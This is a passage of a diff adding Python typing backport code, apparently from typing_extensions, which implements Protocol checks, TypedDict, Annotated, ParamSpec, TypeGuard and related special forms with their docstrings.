cls.__bases__ + if error: + raise TypeError("Cannot inherit from plain Generic") + _maybe_adjust_parameters(cls) + + # Determine if this is a protocol or a concrete subclass. + if not cls.__dict__.get('_is_protocol', None): + cls._is_protocol = any(b is Protocol for b in cls.__bases__) + + # Set (or override) the protocol subclass hook. + def _proto_hook(other): + if not cls.__dict__.get('_is_protocol', None): + return NotImplemented + if not getattr(cls, '_is_runtime_protocol', False): + if sys._getframe(2).f_globals['__name__'] in ['abc', 'functools']: + return NotImplemented + raise TypeError("Instance and class checks can only be used with" + " @runtime protocols") + if not _is_callable_members_only(cls): + if sys._getframe(2).f_globals['__name__'] in ['abc', 'functools']: + return NotImplemented + raise TypeError("Protocols with non-method members" + " don't support issubclass()") + if not isinstance(other, type): + # Same error as for issubclass(1, int) + raise TypeError('issubclass() arg 1 must be a class') + for attr in _get_protocol_attrs(cls): + for base in other.__mro__: + if attr in base.__dict__: + if base.__dict__[attr] is None: + return NotImplemented + break + annotations = getattr(base, '__annotations__', {}) + if (isinstance(annotations, typing.Mapping) and + attr in annotations and + isinstance(other, _ProtocolMeta) and + other._is_protocol): + break + else: + return NotImplemented + return True + if '__subclasshook__' not in cls.__dict__: + cls.__subclasshook__ = _proto_hook + + # We have nothing more to do for non-protocols. + if not cls._is_protocol: + return + + # Check consistency of bases. + for base in cls.__bases__: + if not (base in (object, typing.Generic) or + base.__module__ == 'collections.abc' and + base.__name__ in _PROTO_WHITELIST or + isinstance(base, _ProtocolMeta) and base._is_protocol): + raise TypeError('Protocols can only inherit from other' + f' protocols, got {repr(base)}') + cls.__init__ = _no_init + + +# 3.8+ +if hasattr(typing, 'runtime_checkable'): + runtime_checkable = typing.runtime_checkable +# 3.7 +else: + def runtime_checkable(cls): + """Mark a protocol class as a runtime protocol, so that it + can be used with isinstance() and issubclass(). Raise TypeError + if applied to a non-protocol class. + + This allows a simple-minded structural check very similar to the + one-offs in collections.abc such as Hashable. + """ + if not isinstance(cls, _ProtocolMeta) or not cls._is_protocol: + raise TypeError('@runtime_checkable can be only applied to protocol classes,' + f' got {cls!r}') + cls._is_runtime_protocol = True + return cls + + +# Exists for backwards compatibility. +runtime = runtime_checkable + + +# 3.8+ +if hasattr(typing, 'SupportsIndex'): + SupportsIndex = typing.SupportsIndex +# 3.7 +else: + @runtime_checkable + class SupportsIndex(Protocol): + __slots__ = () + + @abc.abstractmethod + def __index__(self) -> int: + pass + + +if hasattr(typing, "Required"): + # The standard library TypedDict in Python 3.8 does not store runtime information + # about which (if any) keys are optional. See https://bugs.python.org/issue38834 + # The standard library TypedDict in Python 3.9.0/1 does not honour the "total" + # keyword with old-style TypedDict(). See https://bugs.python.org/issue42059 + # The standard library TypedDict below Python 3.11 does not store runtime + # information about optional and required keys when using Required or NotRequired. + # Generic TypedDicts are also impossible using typing.TypedDict on Python <3.11. + TypedDict = typing.TypedDict + _TypedDictMeta = typing._TypedDictMeta + is_typeddict = typing.is_typeddict +else: + def _check_fails(cls, other): + try: + if sys._getframe(1).f_globals['__name__'] not in ['abc', + 'functools', + 'typing']: + # Typed dicts are only for static structural subtyping. + raise TypeError('TypedDict does not support instance and class checks') + except (AttributeError, ValueError): + pass + return False + + def _dict_new(*args, **kwargs): + if not args: + raise TypeError('TypedDict.__new__(): not enough arguments') + _, args = args[0], args[1:] # allow the "cls" keyword be passed + return dict(*args, **kwargs) + + _dict_new.__text_signature__ = '($cls, _typename, _fields=None, /, **kwargs)' + + def _typeddict_new(*args, total=True, **kwargs): + if not args: + raise TypeError('TypedDict.__new__(): not enough arguments') + _, args = args[0], args[1:] # allow the "cls" keyword be passed + if args: + typename, args = args[0], args[1:] # allow the "_typename" keyword be passed + elif '_typename' in kwargs: + typename = kwargs.pop('_typename') + import warnings + warnings.warn("Passing '_typename' as keyword argument is deprecated", + DeprecationWarning, stacklevel=2) + else: + raise TypeError("TypedDict.__new__() missing 1 required positional " + "argument: '_typename'") + if args: + try: + fields, = args # allow the "_fields" keyword be passed + except ValueError: + raise TypeError('TypedDict.__new__() takes from 2 to 3 ' + f'positional arguments but {len(args) + 2} ' + 'were given') + elif '_fields' in kwargs and len(kwargs) == 1: + fields = kwargs.pop('_fields') + import warnings + warnings.warn("Passing '_fields' as keyword argument is deprecated", + DeprecationWarning, stacklevel=2) + else: + fields = None + + if fields is None: + fields = kwargs + elif kwargs: + raise TypeError("TypedDict takes either a dict or keyword arguments," + " but not both") + + ns = {'__annotations__': dict(fields)} + try: + # Setting correct module is necessary to make typed dict classes pickleable. + ns['__module__'] = sys._getframe(1).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): + pass + + return _TypedDictMeta(typename, (), ns, total=total) + + _typeddict_new.__text_signature__ = ('($cls, _typename, _fields=None,' + ' /, *, total=True, **kwargs)') + + class _TypedDictMeta(type): + def __init__(cls, name, bases, ns, total=True): + super().__init__(name, bases, ns) + + def __new__(cls, name, bases, ns, total=True): + # Create new typed dict class object. + # This method is called directly when TypedDict is subclassed, + # or via _typeddict_new when TypedDict is instantiated. This way + # TypedDict supports all three syntaxes described in its docstring. + # Subclasses and instances of TypedDict return actual dictionaries + # via _dict_new. + ns['__new__'] = _typeddict_new if name == 'TypedDict' else _dict_new + # Don't insert typing.Generic into __bases__ here, + # or Generic.__init_subclass__ will raise TypeError + # in the super().__new__() call. + # Instead, monkey-patch __bases__ onto the class after it's been created. + tp_dict = super().__new__(cls, name, (dict,), ns) + + if any(issubclass(base, typing.Generic) for base in bases): + tp_dict.__bases__ = (typing.Generic, dict) + _maybe_adjust_parameters(tp_dict) + + annotations = {} + own_annotations = ns.get('__annotations__', {}) + msg = "TypedDict('Name', {f0: t0, f1: t1, ...}); each t must be a type" + own_annotations = { + n: typing._type_check(tp, msg) for n, tp in own_annotations.items() + } + required_keys = set() + optional_keys = set() + + for base in bases: + annotations.update(base.__dict__.get('__annotations__', {})) + required_keys.update(base.__dict__.get('__required_keys__', ())) + optional_keys.update(base.__dict__.get('__optional_keys__', ())) + + annotations.update(own_annotations) + for annotation_key, annotation_type in own_annotations.items(): + annotation_origin = get_origin(annotation_type) + if annotation_origin is Annotated: + annotation_args = get_args(annotation_type) + if annotation_args: + annotation_type = annotation_args[0] + annotation_origin = get_origin(annotation_type) + + if annotation_origin is Required: + required_keys.add(annotation_key) + elif annotation_origin is NotRequired: + optional_keys.add(annotation_key) + elif total: + required_keys.add(annotation_key) + else: + optional_keys.add(annotation_key) + + tp_dict.__annotations__ = annotations + tp_dict.__required_keys__ = frozenset(required_keys) + tp_dict.__optional_keys__ = frozenset(optional_keys) + if not hasattr(tp_dict, '__total__'): + tp_dict.__total__ = total + return tp_dict + + __instancecheck__ = __subclasscheck__ = _check_fails + + TypedDict = _TypedDictMeta('TypedDict', (dict,), {}) + TypedDict.__module__ = __name__ + TypedDict.__doc__ = \ + """A simple typed name space. At runtime it is equivalent to a plain dict. + + TypedDict creates a dictionary type that expects all of its + instances to have a certain set of keys, with each key + associated with a value of a consistent type. This expectation + is not checked at runtime but is only enforced by type checkers. + Usage:: + + class Point2D(TypedDict): + x: int + y: int + label: str + + a: Point2D = {'x': 1, 'y': 2, 'label': 'good'} # OK + b: Point2D = {'z': 3, 'label': 'bad'} # Fails type check + + assert Point2D(x=1, y=2, label='first') == dict(x=1, y=2, label='first') + + The type info can be accessed via the Point2D.__annotations__ dict, and + the Point2D.__required_keys__ and Point2D.__optional_keys__ frozensets. + TypedDict supports two additional equivalent forms:: + + Point2D = TypedDict('Point2D', x=int, y=int, label=str) + Point2D = TypedDict('Point2D', {'x': int, 'y': int, 'label': str}) + + The class syntax is only supported in Python 3.6+, while two other + syntax forms work for Python 2.7 and 3.2+ + """ + + if hasattr(typing, "_TypedDictMeta"): + _TYPEDDICT_TYPES = (typing._TypedDictMeta, _TypedDictMeta) + else: + _TYPEDDICT_TYPES = (_TypedDictMeta,) + + def is_typeddict(tp): + """Check if an annotation is a TypedDict class + + For example:: + class Film(TypedDict): + title: str + year: int + + is_typeddict(Film) # => True + is_typeddict(Union[list, str]) # => False + """ + return isinstance(tp, tuple(_TYPEDDICT_TYPES)) + + +if hasattr(typing, "assert_type"): + assert_type = typing.assert_type + +else: + def assert_type(__val, __typ): + """Assert (to the type checker) that the value is of the given type. + + When the type checker encounters a call to assert_type(), it + emits an error if the value is not of the specified type:: + + def greet(name: str) -> None: + assert_type(name, str) # ok + assert_type(name, int) # type checker error + + At runtime this returns the first argument unchanged and otherwise + does nothing. + """ + return __val + + +if hasattr(typing, "Required"): + get_type_hints = typing.get_type_hints +else: + import functools + import types + + # replaces _strip_annotations() + def _strip_extras(t): + """Strips Annotated, Required and NotRequired from a given type.""" + if isinstance(t, _AnnotatedAlias): + return _strip_extras(t.__origin__) + if hasattr(t, "__origin__") and t.__origin__ in (Required, NotRequired): + return _strip_extras(t.__args__[0]) + if isinstance(t, typing._GenericAlias): + stripped_args = tuple(_strip_extras(a) for a in t.__args__) + if stripped_args == t.__args__: + return t + return t.copy_with(stripped_args) + if hasattr(types, "GenericAlias") and isinstance(t, types.GenericAlias): + stripped_args = tuple(_strip_extras(a) for a in t.__args__) + if stripped_args == t.__args__: + return t + return types.GenericAlias(t.__origin__, stripped_args) + if hasattr(types, "UnionType") and isinstance(t, types.UnionType): + stripped_args = tuple(_strip_extras(a) for a in t.__args__) + if stripped_args == t.__args__: + return t + return functools.reduce(operator.or_, stripped_args) + + return t + + def get_type_hints(obj, globalns=None, localns=None, include_extras=False): + """Return type hints for an object. + + This is often the same as obj.__annotations__, but it handles + forward references encoded as string literals, adds Optional[t] if a + default value equal to None is set and recursively replaces all + 'Annotated[T, ...]', 'Required[T]' or 'NotRequired[T]' with 'T' + (unless 'include_extras=True'). + + The argument may be a module, class, method, or function. The annotations + are returned as a dictionary. For classes, annotations include also + inherited members. + + TypeError is raised if the argument is not of a type that can contain + annotations, and an empty dictionary is returned if no annotations are + present. + + BEWARE -- the behavior of globalns and localns is counterintuitive + (unless you are familiar with how eval() and exec() work). The + search order is locals first, then globals. + + - If no dict arguments are passed, an attempt is made to use the + globals from obj (or the respective module's globals for classes), + and these are also used as the locals. If the object does not appear + to have globals, an empty dictionary is used. + + - If one dict argument is passed, it is used for both globals and + locals. + + - If two dict arguments are passed, they specify globals and + locals, respectively. + """ + if hasattr(typing, "Annotated"): + hint = typing.get_type_hints( + obj, globalns=globalns, localns=localns, include_extras=True + ) + else: + hint = typing.get_type_hints(obj, globalns=globalns, localns=localns) + if include_extras: + return hint + return {k: _strip_extras(t) for k, t in hint.items()} + + +# Python 3.9+ has PEP 593 (Annotated) +if hasattr(typing, 'Annotated'): + Annotated = typing.Annotated + # Not exported and not a public API, but needed for get_origin() and get_args() + # to work. + _AnnotatedAlias = typing._AnnotatedAlias +# 3.7-3.8 +else: + class _AnnotatedAlias(typing._GenericAlias, _root=True): + """Runtime representation of an annotated type. + + At its core 'Annotated[t, dec1, dec2, ...]' is an alias for the type 't' + with extra annotations. The alias behaves like a normal typing alias, + instantiating is the same as instantiating the underlying type, binding + it to types is also the same. + """ + def __init__(self, origin, metadata): + if isinstance(origin, _AnnotatedAlias): + metadata = origin.__metadata__ + metadata + origin = origin.__origin__ + super().__init__(origin, origin) + self.__metadata__ = metadata + + def copy_with(self, params): + assert len(params) == 1 + new_type = params[0] + return _AnnotatedAlias(new_type, self.__metadata__) + + def __repr__(self): + return (f"typing_extensions.Annotated[{typing._type_repr(self.__origin__)}, " + f"{', '.join(repr(a) for a in self.__metadata__)}]") + + def __reduce__(self): + return operator.getitem, ( + Annotated, (self.__origin__,) + self.__metadata__ + ) + + def __eq__(self, other): + if not isinstance(other, _AnnotatedAlias): + return NotImplemented + if self.__origin__ != other.__origin__: + return False + return self.__metadata__ == other.__metadata__ + + def __hash__(self): + return hash((self.__origin__, self.__metadata__)) + + class Annotated: + """Add context specific metadata to a type. + + Example: Annotated[int, runtime_check.Unsigned] indicates to the + hypothetical runtime_check module that this type is an unsigned int. + Every other consumer of this type can ignore this metadata and treat + this type as int. + + The first argument to Annotated must be a valid type (and will be in + the __origin__ field), the remaining arguments are kept as a tuple in + the __extra__ field. + + Details: + + - It's an error to call `Annotated` with less than two arguments. + - Nested Annotated are flattened:: + + Annotated[Annotated[T, Ann1, Ann2], Ann3] == Annotated[T, Ann1, Ann2, Ann3] + + - Instantiating an annotated type is equivalent to instantiating the + underlying type:: + + Annotated[C, Ann1](5) == C(5) + + - Annotated can be used as a generic type alias:: + + Optimized = Annotated[T, runtime.Optimize()] + Optimized[int] == Annotated[int, runtime.Optimize()] + + OptimizedList = Annotated[List[T], runtime.Optimize()] + OptimizedList[int] == Annotated[List[int], runtime.Optimize()] + """ + + __slots__ = () + + def __new__(cls, *args, **kwargs): + raise TypeError("Type Annotated cannot be instantiated.") + + @typing._tp_cache + def __class_getitem__(cls, params): + if not isinstance(params, tuple) or len(params) < 2: + raise TypeError("Annotated[...] should be used " + "with at least two arguments (a type and an " + "annotation).") + allowed_special_forms = (ClassVar, Final) + if get_origin(params[0]) in allowed_special_forms: + origin = params[0] + else: + msg = "Annotated[t, ...]: t must be a type." + origin = typing._type_check(params[0], msg) + metadata = tuple(params[1:]) + return _AnnotatedAlias(origin, metadata) + + def __init_subclass__(cls, *args, **kwargs): + raise TypeError( + f"Cannot subclass {cls.__module__}.Annotated" + ) + +# Python 3.8 has get_origin() and get_args() but those implementations aren't +# Annotated-aware, so we can't use those. Python 3.9's versions don't support +# ParamSpecArgs and ParamSpecKwargs, so only Python 3.10's versions will do. +if sys.version_info[:2] >= (3, 10): + get_origin = typing.get_origin + get_args = typing.get_args +# 3.7-3.9 +else: + try: + # 3.9+ + from typing import _BaseGenericAlias + except ImportError: + _BaseGenericAlias = typing._GenericAlias + try: + # 3.9+ + from typing import GenericAlias as _typing_GenericAlias + except ImportError: + _typing_GenericAlias = typing._GenericAlias + + def get_origin(tp): + """Get the unsubscripted version of a type. + + This supports generic types, Callable, Tuple, Union, Literal, Final, ClassVar + and Annotated. Return None for unsupported types. Examples:: + + get_origin(Literal[42]) is Literal + get_origin(int) is None + get_origin(ClassVar[int]) is ClassVar + get_origin(Generic) is Generic + get_origin(Generic[T]) is Generic + get_origin(Union[T, int]) is Union + get_origin(List[Tuple[T, T]][int]) == list + get_origin(P.args) is P + """ + if isinstance(tp, _AnnotatedAlias): + return Annotated + if isinstance(tp, (typing._GenericAlias, _typing_GenericAlias, _BaseGenericAlias, + ParamSpecArgs, ParamSpecKwargs)): + return tp.__origin__ + if tp is typing.Generic: + return typing.Generic + return None + + def get_args(tp): + """Get type arguments with all substitutions performed. + + For unions, basic simplifications used by Union constructor are performed. + Examples:: + get_args(Dict[str, int]) == (str, int) + get_args(int) == () + get_args(Union[int, Union[T, int], str][int]) == (int, str) + get_args(Union[int, Tuple[T, int]][str]) == (int, Tuple[str, int]) + get_args(Callable[[], T][int]) == ([], int) + """ + if isinstance(tp, _AnnotatedAlias): + return (tp.__origin__,) + tp.__metadata__ + if isinstance(tp, (typing._GenericAlias, _typing_GenericAlias)): + if getattr(tp, "_special", False): + return () + res = tp.__args__ + if get_origin(tp) is collections.abc.Callable and res[0] is not Ellipsis: + res = (list(res[:-1]), res[-1]) + return res + return () + + +# 3.10+ +if hasattr(typing, 'TypeAlias'): + TypeAlias = typing.TypeAlias +# 3.9 +elif sys.version_info[:2] >= (3, 9): + class _TypeAliasForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + @_TypeAliasForm + def TypeAlias(self, parameters): + """Special marker indicating that an assignment should + be recognized as a proper type alias definition by type + checkers. + + For example:: + + Predicate: TypeAlias = Callable[..., bool] + + It's invalid when used anywhere except as in the example above. + """ + raise TypeError(f"{self} is not subscriptable") +# 3.7-3.8 +else: + class _TypeAliasForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + TypeAlias = _TypeAliasForm('TypeAlias', + doc="""Special marker indicating that an assignment should + be recognized as a proper type alias definition by type + checkers. + + For example:: + + Predicate: TypeAlias = Callable[..., bool] + + It's invalid when used anywhere except as in the example + above.""") + + +# Python 3.10+ has PEP 612 +if hasattr(typing, 'ParamSpecArgs'): + ParamSpecArgs = typing.ParamSpecArgs + ParamSpecKwargs = typing.ParamSpecKwargs +# 3.7-3.9 +else: + class _Immutable: + """Mixin to indicate that object should not be copied.""" + __slots__ = () + + def __copy__(self): + return self + + def __deepcopy__(self, memo): + return self + + class ParamSpecArgs(_Immutable): + """The args for a ParamSpec object. + + Given a ParamSpec object P, P.args is an instance of ParamSpecArgs. + + ParamSpecArgs objects have a reference back to their ParamSpec: + + P.args.__origin__ is P + + This type is meant for runtime introspection and has no special meaning to + static type checkers. + """ + def __init__(self, origin): + self.__origin__ = origin + + def __repr__(self): + return f"{self.__origin__.__name__}.args" + + def __eq__(self, other): + if not isinstance(other, ParamSpecArgs): + return NotImplemented + return self.__origin__ == other.__origin__ + + class ParamSpecKwargs(_Immutable): + """The kwargs for a ParamSpec object. + + Given a ParamSpec object P, P.kwargs is an instance of ParamSpecKwargs. + + ParamSpecKwargs objects have a reference back to their ParamSpec: + + P.kwargs.__origin__ is P + + This type is meant for runtime introspection and has no special meaning to + static type checkers. + """ + def __init__(self, origin): + self.__origin__ = origin + + def __repr__(self): + return f"{self.__origin__.__name__}.kwargs" + + def __eq__(self, other): + if not isinstance(other, ParamSpecKwargs): + return NotImplemented + return self.__origin__ == other.__origin__ + +# 3.10+ +if hasattr(typing, 'ParamSpec'): + ParamSpec = typing.ParamSpec +# 3.7-3.9 +else: + + # Inherits from list as a workaround for Callable checks in Python < 3.9.2. + class ParamSpec(list): + """Parameter specification variable. + + Usage:: + + P = ParamSpec('P') + + Parameter specification variables exist primarily for the benefit of static + type checkers. They are used to forward the parameter types of one + callable to another callable, a pattern commonly found in higher order + functions and decorators. They are only valid when used in ``Concatenate``, + or s the first argument to ``Callable``. In Python 3.10 and higher, + they are also supported in user-defined Generics at runtime. + See class Generic for more information on generic types. An + example for annotating a decorator:: + + T = TypeVar('T') + P = ParamSpec('P') + + def add_logging(f: Callable[P, T]) -> Callable[P, T]: + '''A type-safe decorator to add logging to a function.''' + def inner(*args: P.args, **kwargs: P.kwargs) -> T: + logging.info(f'{f.__name__} was called') + return f(*args, **kwargs) + return inner + + @add_logging + def add_two(x: float, y: float) -> float: + '''Add two numbers together.''' + return x + y + + Parameter specification variables defined with covariant=True or + contravariant=True can be used to declare covariant or contravariant + generic types. These keyword arguments are valid, but their actual semantics + are yet to be decided. See PEP 612 for details. + + Parameter specification variables can be introspected. e.g.: + + P.__name__ == 'T' + P.__bound__ == None + P.__covariant__ == False + P.__contravariant__ == False + + Note that only parameter specification variables defined in global scope can + be pickled. + """ + + # Trick Generic __parameters__. + __class__ = typing.TypeVar + + @property + def args(self): + return ParamSpecArgs(self) + + @property + def kwargs(self): + return ParamSpecKwargs(self) + + def __init__(self, name, *, bound=None, covariant=False, contravariant=False): + super().__init__([self]) + self.__name__ = name + self.__covariant__ = bool(covariant) + self.__contravariant__ = bool(contravariant) + if bound: + self.__bound__ = typing._type_check(bound, 'Bound must be a type.') + else: + self.__bound__ = None + + # for pickling: + try: + def_mod = sys._getframe(1).f_globals.get('__name__', '__main__') + except (AttributeError, ValueError): + def_mod = None + if def_mod != 'typing_extensions': + self.__module__ = def_mod + + def __repr__(self): + if self.__covariant__: + prefix = '+' + elif self.__contravariant__: + prefix = '-' + else: + prefix = '~' + return prefix + self.__name__ + + def __hash__(self): + return object.__hash__(self) + + def __eq__(self, other): + return self is other + + def __reduce__(self): + return self.__name__ + + # Hack to get typing._type_check to pass. + def __call__(self, *args, **kwargs): + pass + + +# 3.7-3.9 +if not hasattr(typing, 'Concatenate'): + # Inherits from list as a workaround for Callable checks in Python < 3.9.2. + class _ConcatenateGenericAlias(list): + + # Trick Generic into looking into this for __parameters__. + __class__ = typing._GenericAlias + + # Flag in 3.8. + _special = False + + def __init__(self, origin, args): + super().__init__(args) + self.__origin__ = origin + self.__args__ = args + + def __repr__(self): + _type_repr = typing._type_repr + return (f'{_type_repr(self.__origin__)}' + f'[{", ".join(_type_repr(arg) for arg in self.__args__)}]') + + def __hash__(self): + return hash((self.__origin__, self.__args__)) + + # Hack to get typing._type_check to pass in Generic. + def __call__(self, *args, **kwargs): + pass + + @property + def __parameters__(self): + return tuple( + tp for tp in self.__args__ if isinstance(tp, (typing.TypeVar, ParamSpec)) + ) + + +# 3.7-3.9 +@typing._tp_cache +def _concatenate_getitem(self, parameters): + if parameters == (): + raise TypeError("Cannot take a Concatenate of no types.") + if not isinstance(parameters, tuple): + parameters = (parameters,) + if not isinstance(parameters[-1], ParamSpec): + raise TypeError("The last parameter to Concatenate should be a " + "ParamSpec variable.") + msg = "Concatenate[arg, ...]: each arg must be a type." + parameters = tuple(typing._type_check(p, msg) for p in parameters) + return _ConcatenateGenericAlias(self, parameters) + + +# 3.10+ +if hasattr(typing, 'Concatenate'): + Concatenate = typing.Concatenate + _ConcatenateGenericAlias = typing._ConcatenateGenericAlias # noqa +# 3.9 +elif sys.version_info[:2] >= (3, 9): + @_TypeAliasForm + def Concatenate(self, parameters): + """Used in conjunction with ``ParamSpec`` and ``Callable`` to represent a + higher order function which adds, removes or transforms parameters of a + callable. + + For example:: + + Callable[Concatenate[int, P], int] + + See PEP 612 for detailed information. + """ + return _concatenate_getitem(self, parameters) +# 3.7-8 +else: + class _ConcatenateForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + return _concatenate_getitem(self, parameters) + + Concatenate = _ConcatenateForm( + 'Concatenate', + doc="""Used in conjunction with ``ParamSpec`` and ``Callable`` to represent a + higher order function which adds, removes or transforms parameters of a + callable. + + For example:: + + Callable[Concatenate[int, P], int] + + See PEP 612 for detailed information. + """) + +# 3.10+ +if hasattr(typing, 'TypeGuard'): + TypeGuard = typing.TypeGuard +# 3.9 +elif sys.version_info[:2] >= (3, 9): + class _TypeGuardForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + @_TypeGuardForm + def TypeGuard(self, parameters): + """Special typing form used to annotate the return type of a user-defined + type guard function. ``TypeGuard`` only accepts a single type argument. + At runtime, functions marked this way should return a boolean. + + ``TypeGuard`` aims to benefit *type narrowing* -- a technique used by static + type checkers to determine a more precise type of an expression within a + program's code flow. Usually type narrowing is done by analyzing + conditional code flow and applying the narrowing to a block of code. The + conditional expression here is sometimes referred to as a "type guard". + + Sometimes it would be convenient to use a user-defined boolean function + as a type guard. Such a function should use ``TypeGuard[...]`` as its + return type to alert static type checkers to this intention. + + Using ``-> TypeGuard`` tells the static type checker that for a given + function: + + 1. The return value is a boolean. + 2. If the return value is ``True``, the type of its argument + is the type inside ``TypeGuard``. + + For example:: + + def is_str(val: Union[str, float]): + # "isinstance" type guard + if isinstance(val, str): + # Type of ``val`` is narrowed to ``str`` + ... + else: + # Else, type of ``val`` is narrowed to ``float``. + ... + + Strict type narrowing is not enforced -- ``TypeB`` need not be a narrower + form of ``TypeA`` (it can even be a wider form) and this may lead to + type-unsafe results. The main reason is to allow for things like + narrowing ``List[object]`` to ``List[str]`` even though the latter is not + a subtype of the former, since ``List`` is invariant. The responsibility of + writing type-safe type guards is left to the user. + + ``TypeGuard`` also works with type variables. For more information, see + PEP 647 (User-Defined Type Guards). + """ + item = typing._type_check(parameters, f'{self} accepts only a single type.') + return typing._GenericAlias(self, (item,)) +# 3.7-3.8 +else: + class _TypeGuardForm(typing._SpecialForm, _root=True): + + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type') + return typing._GenericAlias(self, (item,)) + + TypeGuard = _TypeGuardForm( + 'TypeGuard', + doc="""Special typing form used to annotate the return type of a user-defined + type guard function. ``TypeGuard`` only accepts a single type argument. + At runtime, functions marked this way should return a boolean. + + ``TypeGuard`` aims to benefit *type narrowing* -- a technique used by static + type checkers to determine a more precise type of an expression within a + program's code flow. Usually type narrowing is done by analyzing + conditional code flow and applying the narrowing to a block of code. The + conditional expression here is sometimes referred to as a "type guard". + + Sometimes it would be convenient to use a user-defined boolean function + as a type guard. Such a function should use ``TypeGuard[...]`` as its + return type to alert static type checkers to this intention. + + Using ``-> TypeGuard`` tells the static type checker that for a given + function: + + 1. The return value is a boolean. + 2. If the return value is ``True``, the type of its argument + is the type inside ``TypeGuard``. + + For example:: + + def is_str(val: Union[str, float]): + # "isinstance" type guard + if isinstance(val, str): + # Type of ``val`` is narrowed to ``str`` + ... + else: + # Else, type of ``val`` is narrowed to ``float``. + ... + + Strict type narrowing is not enforced -- ``TypeB`` need not be a narrower + form of ``TypeA`` (it can even be a wider form) and this may lead to + type-unsafe results. The main reason is to allow for things like + narrowing ``List[object]`` to ``List[str]`` even though the latter is not + a subtype of the former, since ``List`` is invariant. The responsibility of + writing type-safe type guards is left to the user. + + ``TypeGuard`` also works with type variables. For more information, see + PEP 647 (User-Defined Type Guards). + """) + + +# Vendored from cpython typing._SpecialFrom +class _SpecialForm(typing._Final, _root=True): + __slots__ = ('_name', '__doc__', '_getitem') + + def __init__(self, getitem): + self._getitem = getitem + self._name = getitem.__name__ + self.__doc__ = getitem.__doc__ + + def __getattr__(self, item): + if item in {'__name__', '__qualname__'}: + return self._name + + raise AttributeError(item) + + def __mro_entries__(self, bases): + raise TypeError(f"Cannot subclass {self!r}") + + def __repr__(self): + return f'typing_extensions.{self._name}' + + def __reduce__(self): + return self._name + + def __call__(self, *args, **kwds): + raise TypeError(f"Cannot instantiate {self!r}") + + def __or__(self, other): + return typing.Union[self, other] + + def __ror__(self, other): + return typing.Union[other, self] + + def __instancecheck__(self, obj): + raise TypeError(f"{self} cannot be used with isinstance()") + + def __subclasscheck__(self, cls): + raise TypeError(f"{self} cannot be used with issubclass()") + + @typing._tp_cache + def __getitem__(self, parameters): + return self._getitem(self, parameters) + + +if hasattr(typing, "LiteralString"): + LiteralString = typing.LiteralString +else: + @_SpecialForm + def LiteralString(self, params): + """Represents an arbitrary literal string. + + Example:: + + from typing_extensions import LiteralString + + def query(sql: LiteralString) -> ...: + ... + + query("SELECT * FROM table") # ok + query(f"SELECT * FROM {input()}") # not ok + + See PEP 675 for details. + + """ + raise TypeError(f"{self} is not subscriptable") + + +if hasattr(typing, "Self"): + Self = typing.Self +else: + @_SpecialForm + def Self(self, params): + """Used to spell the type of "self" in classes. + + Example:: + + from typing import Self + + class ReturnsSelf: + def parse(self, data: bytes) -> Self: + ... + return self + + """ + + raise TypeError(f"{self} is not subscriptable") + + +if hasattr(typing, "Never"): + Never = typing.Never +else: + @_SpecialForm + def Never(self, params): + """The bottom type, a type that has no members. + + This can be used to define a function that should never be + called, or a function that never returns:: + + from typing_extensions import Never + + def never_call_me(arg: Never) -> None: + pass + + def int_or_str(arg: int | str) -> None: + never_call_me(arg) # type checker error + match arg: + case int(): + print("It's an int") + case str(): + print("It's a str") + case _: + never_call_me(arg) # ok, arg is of type Never + + """ + + raise TypeError(f"{self} is not subscriptable") + + +if hasattr(typing, 'Required'): + Required = typing.Required + NotRequired = typing.NotRequired +elif sys.version_info[:2] >= (3, 9): + class _ExtensionsSpecialForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + @_ExtensionsSpecialForm + def Required(self, parameters): + """A special typing construct to mark a key of a total=False TypedDict + as required. For example: + + class Movie(TypedDict, total=False): + title: Required[str] + year: int + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + + There is no runtime checking that a required key is actually provided + when instantiating a related TypedDict. + """ + item = typing._type_check(parameters, f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + + @_ExtensionsSpecialForm + def NotRequired(self, parameters): + """A special typing construct to mark a key of a TypedDict as + potentially missing. For example: + + class Movie(TypedDict): + title: str + year: NotRequired[int] + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + """ + item = typing._type_check(parameters, f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + +else: + class _RequiredForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + + Required = _RequiredForm( + 'Required', + doc="""A special typing construct to mark a key of a total=False TypedDict + as required. For example: + + class Movie(TypedDict, total=False): + title: Required[str] + year: int + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + + There is no runtime checking that a required key is actually provided + when instantiating a related TypedDict. + """) + NotRequired = _RequiredForm( + 'NotRequired', + doc="""A special typing construct to mark a key of a TypedDict as + potentially missing. For example: + + class Movie(TypedDict): + title: str + year: NotRequired[int] + + m = Movie( + title='The Matrix', # typechecker error if key is omitted + year=1999, + ) + """) + + +if hasattr(typing, "Unpack"): # 3.11+ + Unpack = typing.Unpack +elif sys.version_info[:2] >= (3, 9): + class _UnpackSpecialForm(typing._SpecialForm, _root=True): + def __repr__(self): + return 'typing_extensions.' + self._name + + class _UnpackAlias(typing._GenericAlias, _root=True): + __class__ = typing.TypeVar + + @_UnpackSpecialForm + def Unpack(self, parameters): + """A special typing construct to unpack a variadic type. For example: + + Shape = TypeVarTuple('Shape') + Batch = NewType('Batch', int) + + def add_batch_axis( + x: Array[Unpack[Shape]] + ) -> Array[Batch, Unpack[Shape]]: ... + + """ + item = typing._type_check(parameters, f'{self._name} accepts only a single type.') + return _UnpackAlias(self, (item,)) + + def _is_unpack(obj): + return isinstance(obj, _UnpackAlias) + +else: + class _UnpackAlias(typing._GenericAlias, _root=True): + __class__ = typing.TypeVar + + class _UnpackForm(typing._SpecialForm, _root=True): + def 